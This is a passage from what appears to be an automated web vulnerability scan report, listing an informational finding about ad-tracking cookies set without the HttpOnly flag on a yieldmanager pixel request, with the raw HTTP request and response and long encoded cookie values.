V'!!!!#<qBrC!!xV=!!!!#<qBs(!!yXN!!!!#<nAwa!!yaE!!!!)<pjWE!!yq>!!!!+<s2p/!!yq?!!!!#<pOO/!###L!!!!#<qNtp!##ah!!!!#<pqhD!#(x0!!!!(<pLo[!#+x/!!!!#<nQdW!#.dO!!!!)<pjWE!#0fP!!!!$<qd68!#0fR!!!!$<qd67!#0fW!!!!$<qd68!#0mN!!!!#<nAwa!#16I!!<NC<qDX7!#17A!!7(q<o_%.!#2._!!!!$<qPUB!#2.i!!!!#<okyj!#2Ic!!!!(<oaA$!#2Id!!!!%<oaA!!#3[#!!!!$<nQHk!#3pS!!!!#<p,e4!#3pv!!!!#<p,e4!#4FH!!!!#<s#'h!#4ue!!!!#<p3Y1!#5(U!!!!#<pjT1!#5(W!!!!#<piFJ!#5(Y!!!!#<pjTA!#5(^!!!!#<pjT1!#5(a!!!!#<piFJ!#6Ty!!!!#<oDg4!#89b!!!!#<pqh_!#DL-!!!!#<s#7!!#HhJ!!!!#<qX-f!#I=D!!!!$<pd+P!#Jrp!!!!#<s#)0!#K?^!!!!'<p_19!#L*a!!!!6<qd67!#LI/!!!!#<p]be!#MTC!!!!6<qd68!#MTF!!!!*<q*ty!#MTH!!!!6<qd67!#MTI!!!!6<qd67!#MTJ!!!!6<qd68!#M]c!!!!)<pjWE!#Ms!!!!!#<rao$!#N+W!!!!#<qPUB!#O60!!!!#<nAwa!#O@L!!<NC<qDX7!#O@M!!<NC<qDX7!#OWV!!!!$<ol!U!#OWX!!!!#<ol!J!#O^a!!!!#<nAv8!#P8A!!!!#<nAv8!#Q*T!!!!)<pjWE!#Q+p!!!!)<pjWE!#Q,.!!!!#<pjWF!#Q@W!!!!$<rsC*!#QpI!!!!3<qd67!#QpJ!!!!3<qd67!#QpL!!!!3<qd67!#QpS!!!!3<qd67!#QpU!!!!3<qd67!#RU?!!!!6<qd67!#RUA!!!!6<qd67!#Ri/!!!!)<pjWE!#Rij!!!!)<pjWE!#SCj!!!!%<pjWC!#Sq>!!!!#<nrb9!#T-b!!!!6<qd67!#TnE!!!!6<qd67!#Twl!!!!#<nZs,!#Tws!!!!#<nZjk!#U@t!!!!1<qd67!#U@x!!!!1<qd67!#UA$!!!!1<qd68!#UDQ!!!!*<q*ty!#UF1!!!!$<s#._!#VDX!!!!#<q4hD!#VRb!!!!#<nAv7!#X.$!!!!$<rsC*!#XI9!!!!#<q)LA!#YOT!!!!$<qOId!#YQK!!!!#<oDg)!#YQL!!!!#<pjT*!#]#G!!!!#<pqev!#]Ub!!!!4<qd68!#]Uc!!!!4<qd68!#]Ud!!!!4<qd67!#]Ue!!!!4<qd67!#]Uf!!!!4<qd67!#]Ug!!!!4<qd68!#]Uh!!!!4<qd68!#]Ui!!!!4<qd67!#]Uj!!!!4<qd68!#]Uk!!!!4<qd67!#]Ul!!!!4<qd67!#]Um!!!!4<qd67!#]Un!!!!4<qd67!#]Uo!!!!4<qd67!#]Up!!!!4<qd68!#]Us!!!!4<qd68!#]Uy!!!!4<qd68!#]Z!!!!!.<pN)4!#]Z$!!!!*<pN)4!#]w8!!!!'<q*ty!#]w<!!!!'<q*ty!#]wX!!!!%<pv/h!#]w[!!!!'<q*ty!#]wf!!!!'<q*ty!#]wp!!!!'<q*ty!#^c@!!!!*<q*ty!#^cm!!!!*<q*ty!#^f#!!!!2<qd67!#a3k!!!!)<pjWE!#a=#!!!!#<o`%d!#aG>!!!!)<pjWE!#aH+!!!!#<r)hx!#aK:!!!!#<p%Ky!#avQ!!!!#<rsC3!#b<Z!!!!#<piFJ!#b<_!!!!#<pjTD!#b<`!!!!#<pjT1!#b<a!!!!#<pjT1!#b<j!!!!#<pjT1!#b<k!!!!#<piFJ!#b<m!!!!#<nrVk!#b='!!!!#<pjT1!#b=*!!!!#<piFJ!#b=E!!!!#<piFJ!#b=F!!!!#<pjT1!#b=J!!!!#<nrVk!#be'!!!!#<nAv>!#dCX!!!!#<s!iX!#e(n!!!!#<qNNv!#eQ0!!!!#<qbhM!#eQ3!!!!#<qbhM!#e_K!!!!%<q*ty!#ev4!!!!#<rgM%!#f-v!!!!%<ro^u!#f.)!!!!$<ro^u!#f.+!!!!$<ro^u!#f__!!!!#<pd^@!#ffc!!!!#<s0w$!#fle!!!!#<s#7!!#g)H!!!!*<q*ty!#g)I!!!!*<q*ty!#g)L!!!!$<p%L'!#g)M!!!!#<o,,D!#g)N!!!!$<pN'h!#g)O!!!!*<q*ty!#g)P!!!!*<q*ty!#g)Q!!!!*<q*ty!#g)R!!!!*<q*ty!#g)S!!!!*<q*ty!#g)T!!!!*<q*ty!#g)U!!!!*<q*ty!#g)V!!!!*<q*ty!#g)W!!!!*<q*ty!#g)X!!!!*<q*ty!#g)Y!!!!*<q*ty!#g)Z!!!!*<q*ty!#g)[!!!!*<q*ty!#g)]!!!!*<q*ty!#g)^!!!!*<q*ty!#g]5!!!!'<qUl5!#g_f!!!!#<o,,D!#gaO!!!!$<p%L'!#gaP!!!!*<q*ty!#gb5!!!!4<qd67!#h.N!!!!#<oDg4!#j9h!!!!#<n9!g!#l#]!!!!#<pd+P!#nEj!!!!4<qd67!#n`.!!!!#<qX-f!#n`5!!!!$<s2Fd!#pRK!!!!#<rsNk!#p]R!!!!#<p2A7!#p]T!!!!#<p2A7!#q+A!!!!4<qd67!#qF%!!!!*<q*ty!#qF'!!!!*<q*ty!#qUW!!!!4<qd67!#quh!!!!$<s2Fe!#r:6!!!!#<p]dk!#r=i!!!!#<nZs2!#rVT!!!!4<qd67!#sXy!!!!%<qNu<!#so_!!!!#<p]be!#t:@!!!!'<qPUB!#tM)!!!!)<q*ty!#thg!!!!#<pjT1!#uJH!!!!#<pd^1!#uJJ!!!!#<pd^1!#usu!!!!)<pjWE!#v9_!!!!#<nB!e!#w!@!!!!4<qd67!#w!A!!!!4<qd67!#w!B!!!!4<qd67!#w!C!!!!4<qd67!#w!D!!!!4<qd67!#w!F!!!!4<qd68!#w!G!!!!4<qd67!#w!I!!!!4<qd67!#wW9!!!!)<pjWE!#wkr!!!!#<p2A7!#wnK!!!!)<pjWE!#wnM!!!!)<pjWE!#x>u!!!!#<r:uS!#xI*!!!!)<pjWE!#xUM!!!!.<qd67!$#2]!!!!#<r:uS"; pv1="b!!!!3!#819~!$gwk!0E=#!%G'u!!!!$!?5%!$Tey-!ZZ<)!!jYm!'Mrt~~~~~~<p%L'~M.jTN!#tBx!+*gd!$6O/!0H/O!%G[Z!!H<'!!?5%'2^c6!wVd.!%QRf!!ayK!'N^l~~~~~<pN(@~~!#LXe!+*gd!$6O/!,?Kj!$M=4!#:m1!?5%!'2^c5!wVd.!%QRf!%?,K!%?+N~~~~~<pN)1~~!#LXr!+*gd!$6O/!,?Kj!$M=4!#:m1!?5%!'2^c5!wVd.!%QRf!%?,K!%?+N~~~~~<pN)1~M.jTN!#LY.!+*gd!$6O/!,?Kj!$M=4!#:m1!?5%!'2^c5!wVd.!%QRf!%?,K!%?+N~~~~~<pN)1~M.jTN!#Lb-!+*gd!$6O/!,?Kj!$M=4!#:m1!?5%!'2^c5!wVd.!%QRf!%?,K!%?+N~~~~~<pN)1~!!xa=!!Rl,!$5*F!$obP!0pb_!%S@P!!H<)!?5%!'2^c5!?Q8(!'^8i~~~~~~~<sIVw<uRx$!!!([!!v#F#IxPE!$Wiw!(^yZ!#PIK!!!%%!?5%!$px$-!w1K*!%0]Y!%7E2!$/h8~~~~~<rmNa~~!#R%`!!!%O!$V-H!104]!$i6`!#:m1!?5%!'Ng`4!@Dj0!'%it~~~~~~~<s0w(<t/^B!!!([!!qy:!$5*F!$6>P!1%3E!$Zu6!!!!$!?5%!'2^c5!?Q8(!%Q#<~~~~~~~<sIR8<tH8R!!!([!!)Ko!,Y+@!$XwQ!0S?n!%T.a~!#My1$qF>4!ZmB)!!gsP!'_6s~~~~~~<sGBJ<uDg%M.jTN!#dfo!!%f!!#@Z$!0wR)!%R^J!!H<)!?5%!(h(-8!ZmB)!$]#Q!']P]~~~~~~<s2oS<wFY^!!.vL!#*20~!$r*E!0(xK!$ud#!!mT-!?5%!*)IX>!wVd.!%tka!'*BV!%r?`~~~~~<sAqO~~!!mmF~!$r*E!/$s$!%*%/!$S`>!?5%!*)IX>!wVd.!%tka!!Jo4!')>6~~~~~<sAq^~M.jTN!!qrZ!!E)(!$[Rn!/`ni!%1)c!!!!$!?5%!$qF>1!i=9S!!28s!'22D~~~~~~<sGBL<s`:GM.jTN!$!VB!!#/S!$k.N!11oZ!%Y+B!!H<)!?5%!'2^c5!w1K*!'QTP!'eHF!%f(E~~~~~<sIOv<tH68!!!(["; ih="b!!!#!!%?RR!!!!'<rmNX!%?Rl!!!!'<sJ<p!%?m7!!!!#<p]i+!'4A7!!!!%<rmNV!'4A9!!!!%<rmNV!(4uP!!!!#<p^*H!(^yZ!!!!#<rmNa!)AU6!!!!#<roWR!)AU7!!!!$<sIR8!)Mx'!!!!#<roXY!)Mx)!!!!$<ro^y!)Mx+!!!!#<ro^?!*rnf!!!!#<pv/a!+%qh!!!!#<s2o:!+%qt!!!!#<roWO!,?Kj!!!!$<pN)1!,A*-!!!!$<pj[S!,Dln!!!!#<pqk'!-<)d!!!!#<sIWD!->hZ!!!!#<pv0=!-fc'!!!!#<pd]p!.$Cj!!!!$<roX5!.$Cl!!!!#<sIVu!.$Cr!!!!#<qc=7!.?u0!!!!#<sAqM!.L'V!!!!#<rasm!.SpC!!!!#<rat%!.T5l!!!!$<sIOn!.V[>!!!!#<sGAt!.^#V!!!!#<sAqY!.`'5!!!!$<qd6G!.`.T!!!!#<rAKN!.kF<!!!!#<sAqf!.pj#!!!!#<sAqZ!/$s$!!!!#<sAq^!/-R3!!!!#<sGC-!/44k!!!!#<sGB2!/NRu!!!!#<sG..!/U%d!!!!#<ro^r!/`ni!!!!#<sGBL!/maq!!!!#<sGC.!/o!S!!!!#<sJ<'!/x2i!!!!#<sGC,!0(6l!!!!#<p]b^!0(xK!!!!#<sAqO!0.*I!!!!#<sHjL!0.2@!!!!#<pqfN!04O,!!!!#<sAqN!08Fh!!!!#<ro^P!0E=#!!!!#<p%L'!0H/O!!!!$<pN(@!0OD/!!!!#<sAqR!0QKi!!!!#<p]Te!0QKk!!!!$<pk#S!0QLr!!!!#<pN(S!0S3y!!!!#<qd4F!0S?n!!!!'<sGBJ!0a-T!!!!#<sGB^!0cn'!!!!#<q*ty!0cn,!!!!#<p]aI!0con!!!!%<pv08!0coo!!!!#<p]rg!0eUu!!!!$<roWj!0oZP!!!!#<qc=9!0paE!!!!#<roWl!0pb_!!!!#<sIVw!0pbc!!!!$<qd6K!0pd7!!!!#<s0up!0qVB!!!!#<sGAv!0vr,!!!!$<raoq!0wR)!!!!#<s2oS!1$6k!!!!#<s2HA!1%3A!!!!#<roX5!1%3E!!!!#<sIR8!1%3H!!!!$<s0tI!1(-6!!!!#<rmN+!1,h*!!!!$<ro^R!1/X3!!!!(<rmb3!1/X6!!!!)<rmb2!1/]r!!!!(<rmb3!100n!!!!#<roWS!104]!!!!#<s0w(!104d!!!!$<s0t-!11oZ!!!!#<sIOv!1:dV!!!!#<rmMp"; BX=6l13v316lnh2l&b=4&s=8i&t=47

Response

HTTP/1.1 200 OK
Date: Sat, 26 Mar 2011 20:36:22 GMT
Server: YTS/1.18.4
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Set-Cookie: bh="b!!!%2!!!?I!!!!/<qd67!!%#4!!7(q<o_%.!!)OU!!!!$<ro^P!!)Qf!!!!(<nTlX!!*cu!!!!3<qd68!!*oY!!!!%<pN)4!!-?2!!!!*<pN)4!!-Oo!!!!#<nsgt!!/DA!!!!3<qd67!!/Hd!!!!2<qd67!!/He!!!!2<qd68!!04Z!!!!#<qgdp!!1CD!!!!#<p]be!!1Mv!!!!)<qPUB!!1N=!!!!'<qPUB!!1NO!!!!$<qPUB!!1SP!!!!#<nsm5!!2-O!!!!(<nTlW!!2P@!!!!#<nAv8!!3):!!!!5<qd67!!3)?!!!!5<qd67!!3)C!!!!5<qd68!!496!!!!.<s#)C!!4@a!!!!#<q)L?!!4i7!!!!#<qbhM!!4oZ!!!!#<nA,w!!?VS!!<NC<qDX7!!M=.!!!!)<pjWE!!Mev!!!!#<oa?r!!MfS!!!!'<oaA%!!N]q!!!!$<qc5_!!PKh!!!!#<okyj!!PL)!!!!%<okyj!!PL`!!!!'<okyj!!R`u!!!!(<qd68!!Ra#!!!!(<qd68!!Ra)!!!!(<qd68!!UHs!!!!(<pLo`!!Vj^!!!!%<pLoI!!X*c!!!!#<pBKB!!X41!!!!%<pLo[!!Zwb!!!!/<pN)4!![@p!!!!$<qd4F!!bu:!!!!)<pjWE!!itb!!!!6<qd67!!j,.!!<NC<qDX7!!jW8!!!!)<pjWE!!pkJ!!!!6<qd67!!pkL!!!!6<qd68!!qrq!!!!6<qd67!!qrr!!!!6<qd67!!qrv!!!!6<qd68!!qyo!!!!2<qd68!!st`!!!!(<nA,e!!u2f!!!!#<nA,G!!uby!!!!$<rsNj!!xV'!!!!#<qBrC!!xV=!!!!#<qBs(!!yXN!!!!#<nAwa!!yaE!!!!)<pjWE!!yq>!!!!+<s2p/!!yq?!!!!#<pOO/!###L!!!!#<qNtp!##ah!!!!#<pqhD!#(x0!!!!(<pLo[!#+x/!!!!#<nQdW!#.dO!!!!)<pjWE!#0fP!!!!$<qd68!#0fR!!!!$<qd67!#0fW!!!!$<qd68!#0mN!!!!#<nAwa!#16I!!<NC<qDX7!#17A!!7(q<o_%.!#2._!!!!$<qPUB!#2.i!!!!#<okyj!#2Ic!!!!(<oaA$!#2Id!!!!%<oaA!!#3[#!!!!$<nQHk!#3pS!!!!#<p,e4!#3pv!!!!#<p,e4!#4FH!!!!#<s#'h!#4ue!!!!#<p3Y1!#5(U!!!!#<pjT1!#5(W!!!!#<piFJ!#5(Y!!!!#<pjTA!#5(^!!!!#<pjT1!#5(a!!!!#<piFJ!#6Ty!!!!#<oDg4!#89b!!!!#<pqh_!#DL-!!!!#<s#7!!#HhJ!!!!#<qX-f!#I=D!!!!$<pd+P!#Jrp!!!!#<s#)0!#K?^!!!!'<p_19!#L*a!!!!6<qd67!#LI/!!!!#<p]be!#MTC!!!!6<qd68!#MTF!!!!*<q*ty!#MTH!!!!6<qd67!#MTI!!!!6<qd67!#MTJ!!!!6<qd68!#M]c!!!!)<pjWE!#Ms!!!!!#<rao$!#N+W!!!!#<qPUB!#O60!!!!#<nAwa!#O@L!!<NC<qDX7!#O@M!!<NC<qDX7!#OWV!!!!$<ol!U!#OWX!!!!#<ol!J!#O^a!!!!#<nAv8!#P8A!!!!#<nAv8!#Q*T!!!!)<pjWE!#Q+p!!!!)<pjWE!#Q,.!!!!#<pjWF!#Q@W!!!!$<rsC*!#QpI!!!!3<qd67!#QpJ!!!!3<qd67!#QpL!!!!3<qd67!#QpS!!!!3<qd67!#QpU!!!!3<qd67!#R!r!!!!$<scx?!#RU?!!!!6<qd67!#RUA!!!!6<qd67!#Ri/!!!!)<pjWE!#Rij!!!!)<pjWE!#SCj!!!!%<pjWC!#Sq>!!!!#<nrb9!#T-b!!!!6<qd67!#TnE!!!!6<qd67!#Twl!!!!#<nZs,!#Tws!!!!#<nZjk!#U@t!!!!1<qd67!#U@x!!!!1<qd67!#UA$!!!!1<qd68!#UDQ!!!!*<q*ty!#UF1!!!!$<s#._!#VDX!!!!#<q4hD!#VRb!!!!#<nAv7!#X.$!!!!$<rsC*!#XI9!!!!#<q)LA!#YOT!!!!$<qOId!#YQK!!!!#<oDg)!#YQL!!!!#<pjT*!#]#G!!!!#<pqev!#]Ub!!!!4<qd68!#]Uc!!!!4<qd68!#]Ud!!!!4<qd67!#]Ue!!!!4<qd67!#]Uf!!!!4<qd67!#]Ug!!!!4<qd68!#]Uh!!!!4<qd68!#]Ui!!!!4<qd67!#]Uj!!!!4<qd68!#]Uk!!!!4<qd67!#]Ul!!!!4<qd67!#]Um!!!!4<qd67!#]Un!!!!4<qd67!#]Uo!!!!4<qd67!#]Up!!!!4<qd68!#]Us!!!!4<qd68!#]Uy!!!!4<qd68!#]Z!!!!!.<pN)4!#]Z$!!!!*<pN)4!#]w8!!!!'<q*ty!#]w<!!!!'<q*ty!#]wX!!!!%<pv/h!#]w[!!!!'<q*ty!#]wf!!!!'<q*ty!#]wp!!!!'<q*ty!#^c@!!!!*<q*ty!#^cm!!!!*<q*ty!#^f#!!!!2<qd67!#a3k!!!!)<pjWE!#a=#!!!!#<o`%d!#aG>!!!!)<pjWE!#aH+!!!!#<r)hx!#aK:!!!!#<p%Ky!#avQ!!!!#<rsC3!#b<Z!!!!#<piFJ!#b<_!!!!#<pjTD!#b<`!!!!#<pjT1!#b<a!!!!#<pjT1!#b<j!!!!#<pjT1!#b<k!!!!#<piFJ!#b<m!!!!#<nrVk!#b='!!!!#<pjT1!#b=*!!!!#<piFJ!#b=E!!!!#<piFJ!#b=F!!!!#<pjT1!#b=J!!!!#<nrVk!#be'!!!!#<nAv>!#dCX!!!!#<s!iX!#e(n!!!!#<qNNv!#eQ0!!!!#<qbhM!#eQ3!!!!#<qbhM!#e_K!!!!%<q*ty!#ev4!!!!#<rgM%!#f-v!!!!%<ro^u!#f.)!!!!$<ro^u!#f.+!!!!$<ro^u!#f__!!!!#<pd^@!#ffc!!!!#<s0w$!#fle!!!!#<s#7!!#g)H!!!!*<q*ty!#g)I!!!!*<q*ty!#g)L!!!!$<p%L'!#g)M!!!!#<o,,D!#g)N!!!!$<pN'h!#g)O!!!!*<q*ty!#g)P!!!!*<q*ty!#g)Q!!!!*<q*ty!#g)R!!!!*<q*ty!#g)S!!!!*<q*ty!#g)T!!!!*<q*ty!#g)U!!!!*<q*ty!#g)V!!!!*<q*ty!#g)W!!!!*<q*ty!#g)X!!!!*<q*ty!#g)Y!!!!*<q*ty!#g)Z!!!!*<q*ty!#g)[!!!!*<q*ty!#g)]!!!!*<q*ty!#g)^!!!!*<q*ty!#g]5!!!!'<qUl5!#g_f!!!!#<o,,D!#gaO!!!!$<p%L'!#gaP!!!!*<q*ty!#gb5!!!!4<qd67!#h.N!!!!#<oDg4!#j9h!!!!#<n9!g!#l#]!!!!#<pd+P!#nEj!!!!4<qd67!#n`.!!!!#<qX-f!#n`5!!!!$<s2Fd!#pRK!!!!#<rsNk!#p]R!!!!#<p2A7!#p]T!!!!#<p2A7!#q+A!!!!4<qd67!#qF%!!!!*<q*ty!#qF'!!!!*<q*ty!#qUW!!!!4<qd67!#quh!!!!$<s2Fe!#r:6!!!!#<p]dk!#r=i!!!!#<nZs2!#rVT!!!!4<qd67!#sXy!!!!%<qNu<!#so_!!!!#<p]be!#t:@!!!!'<qPUB!#tM)!!!!)<q*ty!#thg!!!!#<pjT1!#uJH!!!!#<pd^1!#uJJ!!!!#<pd^1!#usu!!!!)<pjWE!#v9_!!!!#<nB!e!#w!@!!!!4<qd67!#w!A!!!!4<qd67!#w!B!!!!4<qd67!#w!C!!!!4<qd67!#w!D!!!!4<qd67!#w!F!!!!4<qd68!#w!G!!!!4<qd67!#w!I!!!!4<qd67!#wW9!!!!)<pjWE!#wkr!!!!#<p2A7!#wnK!!!!)<pjWE!#wnM!!!!)<pjWE!#x>u!!!!#<r:uS!#xI*!!!!)<pjWE!#xUM!!!!.<qd67!$#2]!!!!#<r:uS"; path=/; expires=Mon, 25-Mar-2013 20:36:22 GMT
Set-Cookie: BX=6l13v316lnh2l&b=4&s=8i&t=47; path=/; expires=Tue, 19-Jan-2038 03:14:07 GMT
Cache-Control: no-store
Last-Modified: Sat, 26 Mar 2011 20:36:22 GMT
Pragma: no-cache
Content-Length: 43
Content-Type: image/gif
Age: 0
Proxy-Connection: close

GIF89a.............!.......,...........D..;
15.21. http://ad.yieldmanager.com/unpixel  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.yieldmanager.com
Path:   /unpixel

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /unpixel?id=1064782 HTTP/1.1
Host: ad.yieldmanager.com
Proxy-Connection: keep-alive
Referer: http://www.huffingtonpost.com/2011/03/26/geraldine-ferraro-dead-dies_n_840995.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=uid=87d2451c-50fd-11e0-8afd-003048d6d22e&_hmacv=1&_salt=327327191&_keyid=k1&_hmac=87cfa58169cdc261fd30bf9c1633447993c7cde2; bh="b!!!%1!!!?I!!!!/<qd67!!%#4!!7(q<o_%.!!)OU!!!!$<ro^P!!)Qf!!!!(<nTlX!!*cu!!!!3<qd68!!*oY!!!!%<pN)4!!-?2!!!!*<pN)4!!-Oo!!!!#<nsgt!!/DA!!!!3<qd67!!/Hd!!!!2<qd67!!/He!!!!2<qd68!!04Z!!!!#<qgdp!!1CD!!!!#<p]be!!1Mv!!!!)<qPUB!!1N=!!!!'<qPUB!!1NO!!!!$<qPUB!!1SP!!!!#<nsm5!!2-O!!!!(<nTlW!!2P@!!!!#<nAv8!!3):!!!!5<qd67!!3)?!!!!5<qd67!!3)C!!!!5<qd68!!496!!!!.<s#)C!!4@a!!!!#<q)L?!!4i7!!!!#<qbhM!!4oZ!!!!#<nA,w!!?VS!!<NC<qDX7!!M=.!!!!)<pjWE!!Mev!!!!#<oa?r!!MfS!!!!'<oaA%!!N]q!!!!$<qc5_!!PKh!!!!#<okyj!!PL)!!!!%<okyj!!PL`!!!!'<okyj!!R`u!!!!(<qd68!!Ra#!!!!(<qd68!!Ra)!!!!(<qd68!!UHs!!!!(<pLo`!!Vj^!!!!%<pLoI!!X*c!!!!#<pBKB!!X41!!!!%<pLo[!!Zwb!!!!/<pN)4!![@p!!!!$<qd4F!!bu:!!!!)<pjWE!!itb!!!!6<qd67!!j,.!!<NC<qDX7!!jW8!!!!)<pjWE!!pkJ!!!!6<qd67!!pkL!!!!6<qd68!!qrq!!!!6<qd67!!qrr!!!!6<qd67!!qrv!!!!6<qd68!!qyo!!!!2<qd68!!st`!!!!(<nA,e!!u2f!!!!#<nA,G!!uby!!!!$<rsNj!!xV'!!!!#<qBrC!!xV=!!!!#<qBs(!!yXN!!!!#<nAwa!!yaE!!!!)<pjWE!!yq>!!!!+<s2p/!!yq?!!!!#<pOO/!###L!!!!#<qNtp!##ah!!!!#<pqhD!#(x0!!!!(<pLo[!#+x/!!!!#<nQdW!#.dO!!!!)<pjWE!#0fP!!!!$<qd68!#0fR!!!!$<qd67!#0fW!!!!$<qd68!#0mN!!!!#<nAwa!#16I!!<NC<qDX7!#17A!!7(q<o_%.!#2._!!!!$<qPUB!#2.i!!!!#<okyj!#2Ic!!!!(<oaA$!#2Id!!!!%<oaA!!#3[#!!!!$<nQHk!#3pS!!!!#<p,e4!#3pv!!!!#<p,e4!#4FH!!!!#<s#'h!#4ue!!!!#<p3Y1!#5(U!!!!#<pjT1!#5(W!!!!#<piFJ!#5(Y!!!!#<pjTA!#5(^!!!!#<pjT1!#5(a!!!!#<piFJ!#6Ty!!!!#<oDg4!#89b!!!!#<pqh_!#DL-!!!!#<s#7!!#HhJ!!!!#<qX-f!#I=D!!!!$<pd+P!#Jrp!!!!#<s#)0!#K?^!!!!'<p_19!#L*a!!!!6<qd67!#LI/!!!!#<p]be!#MTC!!!!6<qd68!#MTF!!!!*<q*ty!#MTH!!!!6<qd67!#MTI!!!!6<qd67!#MTJ!!!!6<qd68!#M]c!!!!)<pjWE!#Ms!!!!!#<rao$!#N+W!!!!#<qPUB!#O60!!!!#<nAwa!#O@L!!<NC<qDX7!#O@M!!<NC<qDX7!#OWV!!!!$<ol!U!#OWX!!!!#<ol!J!#O^a!!!!#<nAv8!#P8A!!!!#<nAv8!#Q*T!!!!)<pjWE!#Q+p!!!!)<pjWE!#Q,.!!!!#<pjWF!#Q@W!!!!$<rsC*!#QpI!!!!3<qd67!#QpJ!!!!3<qd67!#QpL!!!!3<qd67!#QpS!!!!3<qd67!#QpU!!!!3<qd67!#RU?!!!!6<qd67!#RUA!!!!6<qd67!#Ri/!!!!)<pjWE!#Rij!!!!)<pjWE!#SCj!!!!%<pjWC!#Sq>!!!!#<nrb9!#T-b!!!!6<qd67!#TnE!!!!6<qd67!#Twl!!!!#<nZs,!#Tws!!!!#<nZjk!#U@t!!!!1<qd67!#U@x!!!!1<qd67!#UA$!!!!1<qd68!#UDQ!!!!*<q*ty!#UF1!!!!$<s#._!#VDX!!!!#<q4hD!#VRb!!!!#<nAv7!#X.$!!!!$<rsC*!#XI9!!!!#<q)LA!#YOT!!!!$<qOId!#YQK!!!!#<oDg)!#YQL!!!!#<pjT*!#]#G!!!!#<pqev!#]Ub!!!!4<qd68!#]Uc!!!!4<qd68!#]Ud!!!!4<qd67!#]Ue!!!!4<qd67!#]Uf!!!!4<qd67!#]Ug!!!!4<qd68!#]Uh!!!!4<qd68!#]Ui!!!!4<qd67!#]Uj!!!!4<qd68!#]Uk!!!!4<qd67!#]Ul!!!!4<qd67!#]Um!!!!4<qd67!#]Un!!!!4<qd67!#]Uo!!!!4<qd67!#]Up!!!!4<qd68!#]Us!!!!4<qd68!#]Uy!!!!4<qd68!#]Z!!!!!.<pN)4!#]Z$!!!!*<pN)4!#]w8!!!!'<q*ty!#]w<!!!!'<q*ty!#]wX!!!!%<pv/h!#]w[!!!!'<q*ty!#]wf!!!!'<q*ty!#]wp!!!!'<q*ty!#^c@!!!!*<q*ty!#^cm!!!!*<q*ty!#^f#!!!!2<qd67!#a3k!!!!)<pjWE!#a=#!!!!#<o`%d!#aG>!!!!)<pjWE!#aH+!!!!#<r)hx!#aK:!!!!#<p%Ky!#avQ!!!!#<rsC3!#b<Z!!!!#<piFJ!#b<_!!!!#<pjTD!#b<`!!!!#<pjT1!#b<a!!!!#<pjT1!#b<j!!!!#<pjT1!#b<k!!!!#<piFJ!#b<m!!!!#<nrVk!#b='!!!!#<pjT1!#b=*!!!!#<piFJ!#b=E!!!!#<piFJ!#b=F!!!!#<pjT1!#b=J!!!!#<nrVk!#be'!!!!#<nAv>!#dCX!!!!#<s!iX!#e(n!!!!#<qNNv!#eQ0!!!!#<qbhM!#eQ3!!!!#<qbhM!#e_K!!!!%<q*ty!#ev4!!!!#<rgM%!#f-v!!!!%<ro^u!#f.)!!!!$<ro^u!#f.+!!!!$<ro^u!#f__!!!!#<pd^@!#ffc!!!!#<s0w$!#fle!!!!#<s#7!!#g)H!!!!*<q*ty!#g)I!!!!*<q*ty!#g)L!!!!$<p%L'!#g)M!!!!#<o,,D!#g)N!!!!$<pN'h!#g)O!!!!*<q*ty!#g)P!!!!*<q*ty!#g)Q!!!!*<q*ty!#g)R!!!!*<q*ty!#g)S!!!!*<q*ty!#g)T!!!!*<q*ty!#g)U!!!!*<q*ty!#g)V!!!!*<q*ty!#g)W!!!!*<q*ty!#g)X!!!!*<q*ty!#g)Y!!!!*<q*ty!#g)Z!!!!*<q*ty!#g)[!!!!*<q*ty!#g)]!!!!*<q*ty!#g)^!!!!*<q*ty!#g]5!!!!'<qUl5!#g_f!!!!#<o,,D!#gaO!!!!$<p%L'!#gaP!!!!*<q*ty!#gb5!!!!4<qd67!#h.N!!!!#<oDg4!#j9h!!!!#<n9!g!#l#]!!!!#<pd+P!#nEj!!!!4<qd67!#n`.!!!!#<qX-f!#n`5!!!!$<s2Fd!#pRK!!!!#<rsNk!#p]R!!!!#<p2A7!#p]T!!!!#<p2A7!#q+A!!!!4<qd67!#qF%!!!!*<q*ty!#qF'!!!!*<q*ty!#qUW!!!!4<qd67!#quh!!!!$<s2Fe!#r:6!!!!#<p]dk!#r=i!!!!#<nZs2!#rVT!!!!4<qd67!#sXy!!!!%<qNu<!#so_!!!!#<p]be!#t:@!!!!'<qPUB!#tM)!!!!)<q*ty!#thg!!!!#<pjT1!#uJH!!!!#<pd^1!#uJJ!!!!#<pd^1!#usu!!!!)<pjWE!#v9_!!!!#<nB!e!#w!@!!!!4<qd67!#w!A!!!!4<qd67!#w!B!!!!4<qd67!#w!C!!!!4<qd67!#w!D!!!!4<qd67!#w!F!!!!4<qd68!#w!G!!!!4<qd67!#w!I!!!!4<qd67!#wW9!!!!)<pjWE!#wkr!!!!#<p2A7!#wnK!!!!)<pjWE!#wnM!!!!)<pjWE!#x>u!!!!#<r:uS!#xI*!!!!)<pjWE!#xUM!!!!.<qd67!$#2]!!!!#<r:uS"; 